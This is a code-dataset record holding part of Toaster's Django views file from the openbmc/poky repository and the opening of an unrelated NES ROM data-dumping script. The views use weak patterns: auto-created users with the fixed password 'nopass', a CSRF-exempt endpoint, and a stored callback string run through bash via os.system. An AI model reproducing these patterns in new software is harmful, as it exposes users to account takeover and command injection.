mode, or\n# a default \"page not available\" simple functions for interactive mode\n\nif True:\n from django.contrib.auth.models import User\n from django.contrib.auth import authenticate, login\n\n from orm.models import LayerSource, ToasterSetting, Release\n\n import traceback\n\n class BadParameterException(Exception):\n ''' The exception raised on invalid POST requests '''\n pass\n\n # new project\n def newproject(request):\n if not project_enable:\n return redirect( landing )\n\n template = \"newproject.html\"\n context = {\n 'email': request.user.email if request.user.is_authenticated else '',\n 'username': request.user.username if request.user.is_authenticated else '',\n 'releases': Release.objects.order_by(\"description\"),\n }\n\n try:\n context['defaultbranch'] = ToasterSetting.objects.get(name = \"DEFAULT_RELEASE\").value\n except ToasterSetting.DoesNotExist:\n pass\n\n if request.method == \"GET\":\n # render new project page\n return toaster_render(request, template, context)\n elif request.method == \"POST\":\n mandatory_fields = ['projectname', 'ptype']\n try:\n ptype = request.POST.get('ptype')\n if ptype == \"import\":\n mandatory_fields.append('importdir')\n else:\n mandatory_fields.append('projectversion')\n # make sure we have values for all mandatory_fields\n missing = [field for field in mandatory_fields if len(request.POST.get(field, '')) == 0]\n if missing:\n # set alert for missing fields\n raise BadParameterException(\"Fields missing: %s\" % \", \".join(missing))\n\n if not request.user.is_authenticated:\n user = authenticate(username = request.POST.get('username', '_anonuser'), password = 'nopass')\n if user is None:\n user = User.objects.create_user(username = request.POST.get('username', '_anonuser'), email = request.POST.get('email', ''), password = \"nopass\")\n\n user = authenticate(username = user.username, password = 'nopass')\n login(request, user)\n\n # save the project\n if ptype == \"import\":\n if not os.path.isdir('%s/conf' % request.POST['importdir']):\n raise BadParameterException(\"Bad path or missing 'conf' directory (%s)\" % request.POST['importdir'])\n from django.core import management\n management.call_command('buildimport', '--command=import', '--name=%s' % request.POST['projectname'], '--path=%s' % request.POST['importdir'])\n prj = Project.objects.get(name = request.POST['projectname'])\n prj.merged_attr = True\n prj.save()\n else:\n release = Release.objects.get(pk = request.POST.get('projectversion', None ))\n prj = Project.objects.create_project(name = request.POST['projectname'], release = release)\n prj.user_id = request.user.pk\n if 'mergeattr' == request.POST.get('mergeattr', ''):\n prj.merged_attr = True\n prj.save()\n\n return redirect(reverse(project, args=(prj.pk,)) + \"?notify=new-project\")\n\n except (IntegrityError, BadParameterException) as e:\n # fill in page with previously submitted values\n for field in mandatory_fields:\n context.__setitem__(field, request.POST.get(field, \"-- missing\"))\n if isinstance(e, IntegrityError) and \"username\" in str(e):\n context['alert'] = \"Your chosen username is already used\"\n else:\n context['alert'] = str(e)\n return toaster_render(request, template, context)\n\n raise Exception(\"Invalid HTTP method for this page\")\n\n # new project\n def newproject_specific(request, pid):\n if not project_enable:\n return redirect( landing )\n\n project = Project.objects.get(pk=pid)\n template = \"newproject_specific.html\"\n context = {\n 'email': request.user.email if 
request.user.is_authenticated else '',\n 'username': request.user.username if request.user.is_authenticated else '',\n 'releases': Release.objects.order_by(\"description\"),\n 'projectname': project.name,\n 'project_pk': project.pk,\n }\n\n # WORKAROUND: if we already know release, redirect 'newproject_specific' to 'project_specific'\n if '1' == project.get_variable('INTERNAL_PROJECT_SPECIFIC_SKIPRELEASE'):\n return redirect(reverse(project_specific, args=(project.pk,)))\n\n try:\n context['defaultbranch'] = ToasterSetting.objects.get(name = \"DEFAULT_RELEASE\").value\n except ToasterSetting.DoesNotExist:\n pass\n\n if request.method == \"GET\":\n # render new project page\n return toaster_render(request, template, context)\n elif request.method == \"POST\":\n mandatory_fields = ['projectname', 'ptype']\n try:\n ptype = request.POST.get('ptype')\n if ptype == \"build\":\n mandatory_fields.append('projectversion')\n # make sure we have values for all mandatory_fields\n missing = [field for field in mandatory_fields if len(request.POST.get(field, '')) == 0]\n if missing:\n # set alert for missing fields\n raise BadParameterException(\"Fields missing: %s\" % \", \".join(missing))\n\n if not request.user.is_authenticated:\n user = authenticate(username = request.POST.get('username', '_anonuser'), password = 'nopass')\n if user is None:\n user = User.objects.create_user(username = request.POST.get('username', '_anonuser'), email = request.POST.get('email', ''), password = \"nopass\")\n\n user = authenticate(username = user.username, password = 'nopass')\n login(request, user)\n\n # save the project\n if ptype == \"analysis\":\n release = None\n else:\n release = Release.objects.get(pk = request.POST.get('projectversion', None ))\n\n prj = Project.objects.create_project(name = request.POST['projectname'], release = release, existing_project = project)\n prj.user_id = request.user.pk\n prj.save()\n return redirect(reverse(project_specific, args=(prj.pk,)) + \"?notify=new-project\")\n\n except (IntegrityError, BadParameterException) as e:\n # fill in page with previously submitted values\n for field in mandatory_fields:\n context.__setitem__(field, request.POST.get(field, \"-- missing\"))\n if isinstance(e, IntegrityError) and \"username\" in str(e):\n context['alert'] = \"Your chosen username is already used\"\n else:\n context['alert'] = str(e)\n return toaster_render(request, template, context)\n\n raise Exception(\"Invalid HTTP method for this page\")\n\n # Shows the edit project page\n def project(request, pid):\n project = Project.objects.get(pk=pid)\n\n if '1' == os.environ.get('TOASTER_PROJECTSPECIFIC'):\n if request.GET:\n #Example:request.GET=\n params = urlencode(request.GET).replace('%5B%27','').replace('%27%5D','')\n return redirect(\"%s?%s\" % (reverse(project_specific, args=(project.pk,)),params))\n else:\n return redirect(reverse(project_specific, args=(project.pk,)))\n context = {\"project\": project}\n return toaster_render(request, \"project.html\", context)\n\n # Shows the edit project-specific page\n def project_specific(request, pid):\n project = Project.objects.get(pk=pid)\n\n # Are we refreshing from a successful project specific update clone?\n if Project.PROJECT_SPECIFIC_CLONING_SUCCESS == project.get_variable(Project.PROJECT_SPECIFIC_STATUS):\n return redirect(reverse(landing_specific,args=(project.pk,)))\n\n context = {\n \"project\": project,\n \"is_new\" : project.get_variable(Project.PROJECT_SPECIFIC_ISNEW),\n \"default_image_recipe\" : 
project.get_variable(Project.PROJECT_SPECIFIC_DEFAULTIMAGE),\n \"mru\" : Build.objects.all().filter(project=project,outcome=Build.IN_PROGRESS),\n }\n if project.build_set.filter(outcome=Build.IN_PROGRESS).count() > 0:\n context['build_in_progress_none_completed'] = True\n else:\n context['build_in_progress_none_completed'] = False\n return toaster_render(request, \"project.html\", context)\n\n # perform the final actions for the project specific page\n def project_specific_finalize(cmnd, pid):\n project = Project.objects.get(pk=pid)\n callback = project.get_variable(Project.PROJECT_SPECIFIC_CALLBACK)\n if \"update\" == cmnd:\n # Delete all '_PROJECT_PREPARE_' builds\n for b in Build.objects.all().filter(project=project):\n delete_build = False\n for t in b.target_set.all():\n if '_PROJECT_PREPARE_' == t.target:\n delete_build = True\n if delete_build:\n from django.core import management\n management.call_command('builddelete', str(b.id), interactive=False)\n # perform callback at this last moment if defined, in case Toaster gets shutdown next\n default_target = project.get_variable(Project.PROJECT_SPECIFIC_DEFAULTIMAGE)\n if callback:\n callback = callback.replace(\"\",default_target)\n if \"cancel\" == cmnd:\n if callback:\n callback = callback.replace(\"\",\"none\")\n callback = callback.replace(\"--update\",\"--cancel\")\n # perform callback at this last moment if defined, in case this Toaster gets shutdown next\n ret = ''\n if callback:\n ret = os.system('bash -c \"%s\"' % callback)\n project.set_variable(Project.PROJECT_SPECIFIC_CALLBACK,'')\n # Delete the temp project specific variables\n project.set_variable(Project.PROJECT_SPECIFIC_ISNEW,'')\n project.set_variable(Project.PROJECT_SPECIFIC_STATUS,Project.PROJECT_SPECIFIC_NONE)\n # WORKAROUND: Release this workaround flag\n project.set_variable('INTERNAL_PROJECT_SPECIFIC_SKIPRELEASE','')\n\n # Shows the final landing page for project specific update\n def landing_specific(request, pid):\n project_specific_finalize(\"update\", pid)\n context = {\n \"install_dir\": os.environ['TOASTER_DIR'],\n }\n return toaster_render(request, \"landing_specific.html\", context)\n\n # Shows the related landing-specific page\n def landing_specific_cancel(request, pid):\n project_specific_finalize(\"cancel\", pid)\n context = {\n \"install_dir\": os.environ['TOASTER_DIR'],\n \"status\": \"cancel\",\n }\n return toaster_render(request, \"landing_specific.html\", context)\n\n def jsunittests(request):\n \"\"\" Provides a page for the js unit tests \"\"\"\n bbv = BitbakeVersion.objects.filter(branch=\"master\").first()\n release = Release.objects.filter(bitbake_version=bbv).first()\n\n name = \"_js_unit_test_prj_\"\n\n # If there is an existing project by this name delete it.\n # We don't want Lots of duplicates cluttering up the projects.\n Project.objects.filter(name=name).delete()\n\n new_project = Project.objects.create_project(name=name,\n release=release)\n # Add a layer\n layer = new_project.get_all_compatible_layer_versions().first()\n\n ProjectLayer.objects.get_or_create(layercommit=layer,\n project=new_project)\n\n # make sure we have a machine set for this project\n ProjectVariable.objects.get_or_create(project=new_project,\n name=\"MACHINE\",\n value=\"qemux86\")\n context = {'project': new_project}\n return toaster_render(request, \"js-unit-tests.html\", context)\n\n from django.views.decorators.csrf import csrf_exempt\n @csrf_exempt\n @log_view_mixin\n def xhr_testreleasechange(request, pid):\n def response(data):\n return 
HttpResponse(jsonfilter(data),\n content_type=\"application/json\")\n\n \"\"\" returns layer versions that would be deleted on the new\n release__pk \"\"\"\n try:\n prj = Project.objects.get(pk = pid)\n new_release_id = request.GET['new_release_id']\n\n # If we're already on this project do nothing\n if prj.release.pk == int(new_release_id):\n return reponse({\"error\": \"ok\", \"rows\": []})\n\n retval = []\n\n for project in prj.projectlayer_set.all():\n release = Release.objects.get(pk = new_release_id)\n\n layer_versions = prj.get_all_compatible_layer_versions()\n layer_versions = layer_versions.filter(release = release)\n layer_versions = layer_versions.filter(layer__name = project.layercommit.layer.name)\n\n # there is no layer_version with the new release id,\n # and the same name\n if layer_versions.count() < 1:\n retval.append(project)\n\n return response({\"error\":\"ok\",\n \"rows\": [_lv_to_dict(prj) for y in [x.layercommit for x in retval]]\n })\n\n except Exception as e:\n return response({\"error\": str(e) })\n\n @log_view_mixin\n def xhr_configvaredit(request, pid):\n try:\n prj = Project.objects.get(id = pid)\n # There are cases where user can add variables which hold values\n # like http://, file:/// etc. In such case a simple split(\":\")\n # would fail. One example is SSTATE_MIRRORS variable. So we use\n # max_split var to handle them.\n max_split = 1\n # add conf variables\n if 'configvarAdd' in request.POST:\n t=request.POST['configvarAdd'].strip()\n if \":\" in t:\n variable, value = t.split(\":\", max_split)\n else:\n variable = t\n value = \"\"\n\n pt, created = ProjectVariable.objects.get_or_create(project = prj, name = variable, value = value)\n # change conf variables\n if 'configvarChange' in request.POST:\n t=request.POST['configvarChange'].strip()\n if \":\" in t:\n variable, value = t.split(\":\", max_split)\n else:\n variable = t\n value = \"\"\n\n pt, created = ProjectVariable.objects.get_or_create(project = prj, name = variable)\n pt.value=value\n pt.save()\n # remove conf variables\n if 'configvarDel' in request.POST:\n t=request.POST['configvarDel'].strip()\n pt = ProjectVariable.objects.get(pk = int(t)).delete()\n\n # return all project settings, filter out disallowed and elsewhere-managed variables\n vars_managed,vars_fstypes,vars_disallowed = get_project_configvars_context()\n configvars_query = ProjectVariable.objects.filter(project_id = pid).all()\n for var in vars_managed:\n configvars_query = configvars_query.exclude(name = var)\n for var in vars_disallowed:\n configvars_query = configvars_query.exclude(name = var)\n\n return_data = {\n \"error\": \"ok\",\n 'configvars': [(x.name, x.value, x.pk) for x in configvars_query]\n }\n try:\n return_data['distro'] = ProjectVariable.objects.get(project = prj, name = \"DISTRO\").value,\n except ProjectVariable.DoesNotExist:\n pass\n try:\n return_data['dl_dir'] = ProjectVariable.objects.get(project = prj, name = \"DL_DIR\").value,\n except ProjectVariable.DoesNotExist:\n pass\n try:\n return_data['fstypes'] = ProjectVariable.objects.get(project = prj, name = \"IMAGE_FSTYPES\").value,\n except ProjectVariable.DoesNotExist:\n pass\n try:\n return_data['image_install:append'] = ProjectVariable.objects.get(project = prj, name = \"IMAGE_INSTALL:append\").value,\n except ProjectVariable.DoesNotExist:\n pass\n try:\n return_data['package_classes'] = ProjectVariable.objects.get(project = prj, name = \"PACKAGE_CLASSES\").value,\n except ProjectVariable.DoesNotExist:\n pass\n try:\n return_data['sstate_dir'] = 
ProjectVariable.objects.get(project = prj, name = \"SSTATE_DIR\").value,\n except ProjectVariable.DoesNotExist:\n pass\n\n return HttpResponse(json.dumps( return_data ), content_type = \"application/json\")\n\n except Exception as e:\n return HttpResponse(json.dumps({\"error\":str(e) + \"\\n\" + traceback.format_exc()}), content_type = \"application/json\")\n\n\n @log_view_mixin\n def customrecipe_download(request, pid, recipe_id):\n recipe = get_object_or_404(CustomImageRecipe, pk=recipe_id)\n\n file_data = recipe.generate_recipe_file_contents()\n\n response = HttpResponse(file_data, content_type='text/plain')\n response['Content-Disposition'] = \\\n 'attachment; filename=\"%s_%s.bb\"' % (recipe.name,\n recipe.version)\n\n return response\n\n def importlayer(request, pid):\n template = \"importlayer.html\"\n context = {\n 'project': Project.objects.get(id=pid),\n }\n return toaster_render(request, template, context)\n\n def layerdetails(request, pid, layerid):\n project = Project.objects.get(pk=pid)\n layer_version = Layer_Version.objects.get(pk=layerid)\n\n project_layers = ProjectLayer.objects.filter(\n project=project).values_list(\"layercommit_id\",\n flat=True)\n\n context = {\n 'project': project,\n 'layer_source': LayerSource.types_dict(),\n 'layerversion': layer_version,\n 'layerdeps': {\n \"list\": [\n {\n \"id\": dep.id,\n \"name\": dep.layer.name,\n \"layerdetailurl\": reverse('layerdetails',\n args=(pid, dep.pk)),\n \"vcs_url\": dep.layer.vcs_url,\n \"vcs_reference\": dep.get_vcs_reference()\n }\n for dep in layer_version.get_alldeps(project.id)]\n },\n 'projectlayers': list(project_layers)\n }\n\n return toaster_render(request, 'layerdetails.html', context)\n\n\n def get_project_configvars_context():\n # Vars managed outside of this view\n vars_managed = {\n 'MACHINE', 'BBLAYERS'\n }\n\n vars_disallowed = {\n 'PARALLEL_MAKE','BB_NUMBER_THREADS',\n 'BB_DISKMON_DIRS','BB_NUMBER_THREADS','CVS_PROXY_HOST','CVS_PROXY_PORT',\n 'PARALLEL_MAKE','TMPDIR',\n 'all_proxy','ftp_proxy','http_proxy ','https_proxy'\n }\n\n vars_fstypes = Target_Image_File.SUFFIXES\n\n return(vars_managed,sorted(vars_fstypes),vars_disallowed)\n\n def projectconf(request, pid):\n\n try:\n prj = Project.objects.get(id = pid)\n except Project.DoesNotExist:\n return HttpResponseNotFound(\"

<h1>Project id \" + pid + \" is unavailable</h1>
    \")\n\n # remove disallowed and externally managed varaibles from this list\n vars_managed,vars_fstypes,vars_disallowed = get_project_configvars_context()\n configvars = ProjectVariable.objects.filter(project_id = pid).all()\n for var in vars_managed:\n configvars = configvars.exclude(name = var)\n for var in vars_disallowed:\n configvars = configvars.exclude(name = var)\n\n context = {\n 'project': prj,\n 'configvars': configvars,\n 'vars_managed': vars_managed,\n 'vars_fstypes': vars_fstypes,\n 'vars_disallowed': vars_disallowed,\n }\n\n try:\n context['distro'] = ProjectVariable.objects.get(project = prj, name = \"DISTRO\").value\n context['distro_defined'] = \"1\"\n except ProjectVariable.DoesNotExist:\n pass\n try:\n if ProjectVariable.objects.get(project = prj, name = \"DL_DIR\").value == \"${TOPDIR}/../downloads\":\n be = BuildEnvironment.objects.get(pk = str(1))\n dl_dir = os.path.join(dirname(be.builddir), \"downloads\")\n context['dl_dir'] = dl_dir\n pv, created = ProjectVariable.objects.get_or_create(project = prj, name = \"DL_DIR\")\n pv.value = dl_dir\n pv.save()\n else:\n context['dl_dir'] = ProjectVariable.objects.get(project = prj, name = \"DL_DIR\").value\n context['dl_dir_defined'] = \"1\"\n except (ProjectVariable.DoesNotExist, BuildEnvironment.DoesNotExist):\n pass\n try:\n context['fstypes'] = ProjectVariable.objects.get(project = prj, name = \"IMAGE_FSTYPES\").value\n context['fstypes_defined'] = \"1\"\n except ProjectVariable.DoesNotExist:\n pass\n try:\n context['image_install:append'] = ProjectVariable.objects.get(project = prj, name = \"IMAGE_INSTALL:append\").value\n context['image_install_append_defined'] = \"1\"\n except ProjectVariable.DoesNotExist:\n pass\n try:\n context['package_classes'] = ProjectVariable.objects.get(project = prj, name = \"PACKAGE_CLASSES\").value\n context['package_classes_defined'] = \"1\"\n except ProjectVariable.DoesNotExist:\n pass\n try:\n if ProjectVariable.objects.get(project = prj, name = \"SSTATE_DIR\").value == \"${TOPDIR}/../sstate-cache\":\n be = BuildEnvironment.objects.get(pk = str(1))\n sstate_dir = os.path.join(dirname(be.builddir), \"sstate-cache\")\n context['sstate_dir'] = sstate_dir\n pv, created = ProjectVariable.objects.get_or_create(project = prj, name = \"SSTATE_DIR\")\n pv.value = sstate_dir\n pv.save()\n else:\n context['sstate_dir'] = ProjectVariable.objects.get(project = prj, name = \"SSTATE_DIR\").value\n context['sstate_dir_defined'] = \"1\"\n except (ProjectVariable.DoesNotExist, BuildEnvironment.DoesNotExist):\n pass\n\n return toaster_render(request, \"projectconf.html\", context)\n\n def _file_names_for_artifact(build, artifact_type, artifact_id):\n \"\"\"\n Return a tuple (file path, file name for the download response) for an\n artifact of type artifact_type with ID artifact_id for build; if\n artifact type is not supported, returns (None, None)\n \"\"\"\n file_name = None\n response_file_name = None\n\n if artifact_type == \"cookerlog\":\n file_name = build.cooker_log_path\n response_file_name = \"cooker.log\"\n\n elif artifact_type == \"imagefile\":\n file_name = Target_Image_File.objects.get(target__build = build, pk = artifact_id).file_name\n\n elif artifact_type == \"targetkernelartifact\":\n target = TargetKernelFile.objects.get(pk=artifact_id)\n file_name = target.file_name\n\n elif artifact_type == \"targetsdkartifact\":\n target = TargetSDKFile.objects.get(pk=artifact_id)\n file_name = target.file_name\n\n elif artifact_type == \"licensemanifest\":\n file_name = Target.objects.get(build = 
build, pk = artifact_id).license_manifest_path\n\n elif artifact_type == \"packagemanifest\":\n file_name = Target.objects.get(build = build, pk = artifact_id).package_manifest_path\n\n elif artifact_type == \"tasklogfile\":\n file_name = Task.objects.get(build = build, pk = artifact_id).logfile\n\n elif artifact_type == \"logmessagefile\":\n file_name = LogMessage.objects.get(build = build, pk = artifact_id).pathname\n\n if file_name and not response_file_name:\n response_file_name = os.path.basename(file_name)\n\n return (file_name, response_file_name)\n\n def build_artifact(request, build_id, artifact_type, artifact_id):\n \"\"\"\n View which returns a build artifact file as a response\n \"\"\"\n file_name = None\n response_file_name = None\n\n try:\n build = Build.objects.get(pk = build_id)\n file_name, response_file_name = _file_names_for_artifact(\n build, artifact_type, artifact_id\n )\n\n if file_name and response_file_name:\n fsock = open(file_name, \"rb\")\n content_type = MimeTypeFinder.get_mimetype(file_name)\n\n response = HttpResponse(fsock, content_type = content_type)\n\n disposition = \"attachment; filename=\" + response_file_name\n response[\"Content-Disposition\"] = disposition\n\n return response\n else:\n return toaster_render(request, \"unavailable_artifact.html\")\n except (ObjectDoesNotExist, IOError):\n return toaster_render(request, \"unavailable_artifact.html\")\n\n","repo_name":"openbmc/openbmc","sub_path":"poky/bitbake/lib/toaster/toastergui/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":83444,"program_lang":"python","lang":"en","doc_type":"code","stars":1525,"dataset":"github-code","pt":"16"} +{"seq_id":"17821989844","text":"#!/usr/bin/env python3\n\n\"\"\"Dump data in an iNES ROM file.\n\nUsage:\n poetry install\n poetry run ./jvqdump.py input_ines_file_path output_excel_file_path\n\"\"\"\n\nimport argparse\nimport binascii\nimport collections\nimport dataclasses\nimport enum\nimport itertools\nimport operator\nimport struct\nfrom typing import Any, Dict, List, Optional, Sequence, Tuple, Union\n\nimport openpyxl\nimport openpyxl.styles\n\n_ENEMY_GROUP_PATTERN_LIST_ID_COUNT = 155\n_MAP_ID_COUNT = 350\n_MAX_ACTIONS_PER_ENEMY = 8\n_ENEMY_ID_COUNT = 173\n\n\ndef _read_prg_rom(input_ines_file_path: str) -> bytes:\n ines_header_byte_size = 16\n with open(input_ines_file_path, \"rb\") as f:\n header_bytes = f.read(ines_header_byte_size)\n if len(header_bytes) != ines_header_byte_size:\n raise ValueError(\"Invalid iNES header\")\n if header_bytes[0:4] != b\"NES\\x1a\":\n raise ValueError(\"Invalid signature\")\n prg_rom_byte_size = header_bytes[4] * 0x4000\n prg_rom_bytes = f.read(prg_rom_byte_size)\n if len(prg_rom_bytes) != prg_rom_byte_size:\n raise ValueError(\"Insufficient PRG ROM\")\n return prg_rom_bytes\n\n\ndef _decode_string(str_bytes: bytes) -> str:\n byte_to_str = {\n # 0x00: ??\n 0x01: \"あ\",\n 0x02: \"い\",\n 0x03: \"う\",\n 0x04: \"え\",\n 0x05: \"お\",\n 0x06: \"か\",\n 0x07: \"き\",\n 0x08: \"く\",\n 0x09: \"け\",\n 0x0A: \"こ\",\n 0x0B: \"さ\",\n 0x0C: \"し\",\n 0x0D: \"す\",\n 0x0E: \"せ\",\n 0x0F: \"そ\",\n # 0x10: 半濁点\n 0x11: \"た\",\n 0x12: \"ち\",\n 0x13: \"つ\",\n 0x14: \"て\",\n 0x15: \"と\",\n 0x16: \"な\",\n 0x17: \"に\",\n 0x18: \"ぬ\",\n 0x19: \"ね\",\n 0x1A: \"の\",\n 0x1B: \"は\",\n 0x1C: \"ひ\",\n 0x1D: \"ふ\",\n 0x1E: \"へ\",\n 0x1F: \"ほ\",\n 0x20: \"両\",\n 0x21: \"ま\",\n 0x22: \"み\",\n 0x23: \"む\",\n 0x24: \"め\",\n 0x25: \"も\",\n 0x26: \"や\",\n 0x27: \"ゆ\",\n 0x28: \"よ\",\n 0x29: \"ら\",\n 0x2A: \"り\",\n 0x2B: \"る\",\n 0x2C: \"れ\",\n 0x2D: 
\"ろ\",\n 0x2E: \"わ\",\n 0x2F: \"を\",\n 0x30: \"0\",\n 0x31: \"1\",\n 0x32: \"2\",\n 0x33: \"3\",\n 0x34: \"4\",\n 0x35: \"5\",\n 0x36: \"6\",\n 0x37: \"7\",\n 0x38: \"8\",\n 0x39: \"9\",\n 0x3A: \"!\",\n 0x3B: \"?\",\n 0x3C: \"「\",\n 0x3D: \"/\",\n 0x3E: \"・\",\n 0x3F: \"ん\",\n 0x40: \"■\",\n 0x41: \"ア\",\n 0x42: \"イ\",\n 0x43: \"ウ\",\n 0x44: \"エ\",\n 0x45: \"オ\",\n 0x46: \"カ\",\n 0x47: \"キ\",\n 0x48: \"ク\",\n 0x49: \"ケ\",\n 0x4A: \"コ\",\n 0x4B: \"サ\",\n 0x4C: \"シ\",\n 0x4D: \"ス\",\n 0x4E: \"セ\",\n 0x4F: \"ソ\",\n # 0x50: ??\n 0x51: \"タ\",\n 0x52: \"チ\",\n 0x53: \"ツ\",\n 0x54: \"テ\",\n 0x55: \"ト\",\n 0x56: \"ナ\",\n 0x57: \"ニ\",\n 0x58: \"ヌ\",\n 0x59: \"ネ\",\n 0x5A: \"ノ\",\n 0x5B: \"ハ\",\n 0x5C: \"ヒ\",\n 0x5D: \"フ\",\n 0x5E: \"ー\",\n 0x5F: \"ホ\",\n # 0x60: ??\n 0x61: \"マ\",\n 0x62: \"ミ\",\n 0x63: \"ム\",\n 0x64: \"メ\",\n 0x65: \"モ\",\n 0x66: \"ヤ\",\n 0x67: \"ユ\",\n 0x68: \"ヨ\",\n 0x69: \"ラ\",\n 0x6A: \"◆\",\n 0x6B: \"ル\",\n 0x6C: \"レ\",\n 0x6D: \"ロ\",\n 0x6E: \"ワ\",\n 0x6F: \"超\",\n # 0x70: Frame\n # 0x71: Frame\n # 0x72: Frame\n # 0x73: Frame\n # 0x74: Frame\n # 0x75: Frame\n # 0x76: Frame\n # 0x77: Frame\n 0x78: \"ッ\",\n 0x79: \"ャ\",\n 0x7A: \"ュ\",\n 0x7B: \"ョ\",\n 0x7C: \"ァ\",\n 0x7D: \"っ\",\n 0x7E: \"ゃ\",\n 0x7F: \"ン\",\n 0x80: \"ゅ\",\n 0x81: \"ょ\",\n # 0x82: ??\n 0x83: \"ェ\",\n # 0x84: ??\n # 0x85: ??\n 0x86: \"が\",\n 0x87: \"ぎ\",\n 0x88: \"ぐ\",\n 0x89: \"げ\",\n 0x8A: \"ご\",\n 0x8B: \"ざ\",\n 0x8C: \"じ\",\n 0x8D: \"ず\",\n 0x8E: \"ぜ\",\n 0x8F: \"ぞ\",\n # 0x90: Invalid\n 0x91: \"だ\",\n 0x92: \"ぢ\",\n 0x93: \"づ\",\n 0x94: \"で\",\n 0x95: \"ど\",\n # 0x96: Invalid\n # 0x97: Invalid\n # 0x98: Invalid\n # 0x99: Invalid\n # 0x9A: Invalid\n 0x9B: \"ば\",\n 0x9C: \"び\",\n 0x9D: \"ぶ\",\n 0x9E: \"べ\",\n 0x9F: \"ぼ\",\n # 0xA0: Invalid\n 0xA1: \"ぱ\",\n 0xA2: \"ぴ\",\n 0xA3: \"ぶ\",\n 0xA4: \"ぺ\",\n 0xA5: \"ぽ\",\n 0xA6: \"パ\",\n 0xA7: \"ピ\",\n 0xA8: \"プ\",\n # 0xA9: Invalid\n 0xAA: \"ポ\",\n # 0xAB: Invalid\n # 0xAC: Invalid\n # 0xAD: Invalid\n # 0xAE: Invalid\n # 0xAF: Invalid\n # 0xB0: Invalid\n # 0xB1: Invalid\n # 0xB2: Invalid\n # 0xB3: Invalid\n # 0xB4: Invalid\n # 0xB5: Invalid\n # 0xB6: Invalid\n # 0xB7: Invalid\n # 0xB8: Invalid\n # 0xB9: Invalid\n # 0xBA: Invalid\n # 0xBB: Invalid\n # 0xBC: Invalid\n # 0xBD: Invalid\n # 0xBE: Invalid\n # 0xBF: Invalid\n # 0xC0: Invalid\n # 0xC1: Invalid\n # 0xC2: Invalid\n # 0xC3: Invalid\n # 0xC4: Invalid\n # 0xC5: Invalid\n 0xC6: \"ガ\",\n 0xC7: \"ギ\",\n 0xC8: \"グ\",\n 0xC9: \"ゲ\",\n 0xCA: \"ゴ\",\n 0xCB: \"ザ\",\n 0xCC: \"ジ\",\n 0xCD: \"ズ\",\n 0xCE: \"ゼ\",\n 0xCF: \"ゾ\",\n # 0xD0: Invalid\n 0xD1: \"ダ\",\n 0xD2: \"ヂ\",\n 0xD3: \"ヅ\",\n 0xD4: \"デ\",\n 0xD5: \"ド\",\n # 0xD6: Invalid\n # 0xD7: Invalid\n # 0xD8: Invalid\n # 0xD9: Invalid\n # 0xDA: Invalid\n 0xDB: \"バ\",\n 0xDC: \"ビ\",\n 0xDD: \"ブ\",\n # 0xDE: Invalid\n 0xDF: \"ボ\",\n # 0xE0: Invalid\n # 0xE1: Invalid\n # 0xE2: Invalid\n # 0xE3: Invalid\n # 0xE4: Invalid\n # 0xE5: Invalid\n # 0xE6: Invalid\n # 0xE7: Invalid\n # 0xE8: Invalid\n # 0xE9: Invalid\n # 0xEA: Invalid\n # 0xEB: Invalid\n # 0xEC: Invalid\n # 0xED: Invalid\n # 0xEE: Invalid\n # 0xEF: Invalid\n # 0xF0: Invalid\n # 0xF1: Invalid\n # 0xF2: Invalid\n # 0xF3: Invalid\n # 0xF4: Invalid\n # 0xF5: Invalid\n # 0xF6: Invalid\n # 0xF7: Invalid\n # 0xF8: Invalid\n # 0xF9: Invalid\n # 0xFA: Invalid\n # 0xFB: Invalid\n # 0xFC: Invalid\n # 0xFD: Invalid\n # 0xFE: Invalid\n 0xFF: \" \", # Space\n }\n return \"\".join(byte_to_str[s] for s in str_bytes)\n\n\n@enum.unique\nclass _PlayerCharacterType(enum.Enum):\n JUVEI = \"じゅうべえ\"\n RYUHIME = \"りゅうひめ\"\n WOLF = 
\"ウルフ・シロ\"\n IWAN = \"イワン・ガンちゃん\"\n ONITAN = \"オニタン\"\n HINOTORI = \"ひのとり\"\n SARUBOSS = \"サルボス\"\n PENTA = \"ペンタ\"\n LUCKY = \"ラッキー\"\n\n\n@dataclasses.dataclass(frozen=True)\nclass _PlayerCharacterLevel:\n level: int\n hp: int # 命\n cp: int # 超力\n attack: int # 攻撃\n defense: int # 守備\n speed: int # スピード\n ten: int # 天の守り\n shin: int # 芯の強さ\n atama: int # 頭の良さ\n experience_required_from_previous_level: int\n accumulated_experience_required: int\n\n\n@dataclasses.dataclass(frozen=True)\nclass _PlayerCharacter:\n player_character_type: _PlayerCharacterType\n max_level: int\n levels: Sequence[_PlayerCharacterLevel]\n\n\ndef _get_player_character_max_level(prg_rom_bytes: bytes, player_character_type: _PlayerCharacterType) -> int:\n prg_rom_address = {\n _PlayerCharacterType.JUVEI: 0x03C097,\n _PlayerCharacterType.WOLF: 0x03C09C,\n _PlayerCharacterType.RYUHIME: 0x03C098,\n _PlayerCharacterType.IWAN: 0x03C09A,\n _PlayerCharacterType.ONITAN: 0x03C09B,\n _PlayerCharacterType.HINOTORI: 0x03C09D,\n _PlayerCharacterType.SARUBOSS: 0x03C09E,\n _PlayerCharacterType.PENTA: 0x03C09F,\n _PlayerCharacterType.LUCKY: 0x03C0A0,\n }[player_character_type]\n return prg_rom_bytes[prg_rom_address]\n\n\ndef _get_player_character(prg_rom_bytes: bytes, player_character_type: _PlayerCharacterType) -> _PlayerCharacter:\n status_start_prg_rom_address = {\n _PlayerCharacterType.JUVEI: 0x027713,\n _PlayerCharacterType.WOLF: 0x0278D5,\n _PlayerCharacterType.RYUHIME: 0x027A97,\n _PlayerCharacterType.IWAN: 0x027C59,\n _PlayerCharacterType.ONITAN: 0x027DF0,\n _PlayerCharacterType.HINOTORI: 0x027E4A,\n _PlayerCharacterType.SARUBOSS: 0x027EA4,\n _PlayerCharacterType.PENTA: 0x027EEC,\n _PlayerCharacterType.LUCKY: 0x027F46,\n }[player_character_type]\n experience_start_prg_rom_address = {\n _PlayerCharacterType.JUVEI: 0x027519,\n _PlayerCharacterType.WOLF: 0x02757D,\n _PlayerCharacterType.RYUHIME: 0x0275E1,\n _PlayerCharacterType.IWAN: 0x027645,\n _PlayerCharacterType.ONITAN: 0x002769F,\n _PlayerCharacterType.HINOTORI: 0x0276B3,\n _PlayerCharacterType.SARUBOSS: 0x0276C7,\n _PlayerCharacterType.PENTA: 0x0276D7,\n _PlayerCharacterType.LUCKY: 0x0276EB,\n }[player_character_type]\n max_level = _get_player_character_max_level(prg_rom_bytes, player_character_type)\n experience_unit_byte_size = 2\n status_unit_byte_size = 9\n accumulated_experience_required = 